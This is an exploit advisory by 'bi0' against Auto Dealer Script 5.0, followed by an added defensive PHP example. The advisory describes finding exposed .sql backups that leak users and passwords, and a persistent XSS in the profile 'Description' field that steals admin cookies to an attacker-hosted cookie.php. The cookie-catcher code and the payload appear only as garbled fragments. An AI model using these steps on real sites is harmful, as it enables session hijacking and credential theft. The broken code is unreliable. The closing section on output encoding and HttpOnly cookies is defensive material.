 ______     __     ______
/\  == \   /\ \   /\  __ \
\ \  __<   \ \ \  \ \ \/\ \
 \ \_____\  \ \_\  \ \_____\
  \/_____/   \/_/   \/_____/

01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] Acc Auto Dealer Script [ Persistent XSS / SQL backup ]
#
# // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath,redking,Zer0flag,sp1r1t and ssteam.ws ...
#
# // Software Info
# [x] Name : Auto Dealer Script
# [x] Vendor : http://www.accscripts.com/autos/
# [x] Version : 5.0
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [SQL Backup]
#
# http://localhost/[path]/temp/
# and search for .sql files. You can find users & passwords
#
# [ Persistent XSS ]
#
# At the Auto Dealer Script you can register as a normal user and at your Control Panel
# you can modify "Description" and put JavaScript code there to steal cookies. Then if
# the site admin visits your profile you can steal their cookies. EX :
#
# // Cookie Catcher "cookie.php"
# You must host cookie.php somewhere
#=======================================================================
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


'); fclose($fp); ?>
#=========================================================================
#
# // And at your Description type :
#
#=========================================================================
"/>
#=========================================================================
#
# Now if the site admin visits your profile their cookies will be saved at
# http://host/cookie.html
#
[#]------------------------------------------------------------------------------------------[#]
#EOF
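
For defenders: the persistent XSS above works because text stored in "Description" reaches the admin's browser as markup. The following is an added example, not part of the original advisory and not the vendor's code; the function names and the sample string are hypothetical, and it shows the unencoded output pattern beside the encoded one, plus an HttpOnly session cookie that keeps the session out of reach of page script.

```php
<?php
// Added example: not Auto Dealer Script code. All names here are hypothetical.

// Flawed pattern: stored profile text is concatenated into the page as HTML,
// so any markup a user saved in "Description" is interpreted by the browser.
function render_description_unsafe(string $description): string
{
    return '<div class="description">' . $description . '</div>';
}

// Hardened pattern: encode at output time so stored text is shown as text.
// ENT_QUOTES covers both quote styles, which matters if the value is ever
// placed inside an attribute; ENT_SUBSTITUTE replaces invalid byte sequences
// instead of returning an empty string.
function render_description(string $description): string
{
    $text = htmlspecialchars($description, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="description">' . nl2br($text, false) . '</div>';
}

// Defence in depth: mark the session cookie HttpOnly so script running in
// the page cannot read it. Must be called before session_start().
// The array form requires PHP 7.3 or later.
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // assumes the site is served over HTTPS
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// Constructed sample input: harmless markup standing in for a hostile value.
$sample = '"/><b onmouseover="x">hello</b>';

echo render_description_unsafe($sample), "\n"; // markup passes through intact
echo render_description($sample), "\n";        // markup is shown as literal text
```

Encoding has to be applied at every place the description is printed, including admin-side views, since that is where the advisory's scenario plays out.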